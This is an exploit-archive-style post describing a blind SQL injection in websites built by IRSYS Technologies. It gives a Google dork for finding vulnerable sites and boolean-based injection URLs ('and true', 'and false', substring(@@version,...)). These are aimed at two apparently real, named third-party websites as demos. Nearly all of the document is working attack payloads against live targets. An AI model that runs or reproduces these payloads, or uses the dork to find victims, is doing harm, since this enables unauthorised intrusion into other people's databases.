********************************************************* #Exploit Title: IRSYS Technologies - Blind Sql Injection #Date: 2023-12-25 #Exploit Author: Behrouz Mansoori #Google Dork: "Design by IRSYS Technologies" #Category:webapps #Tested On: Mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * http://meridianps.in/page.php?id=1%27%20and%20true--+ * http://meridianps.in/page.php?id=1%27%20and%20false--+ * http://meridianps.in/page.php?id=1%27%20and%20substring(@@version,1,1)=1--+ ### Demo 2: * http://www.tapcoindia.com/page.php?id=1%27%20and%20true--+ * http://www.tapcoindia.com/page.php?id=1%27%20and%20false--+ * http://www.tapcoindia.com/page.php?id=1%27%20and%20substring(@@version,1,1)=1--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************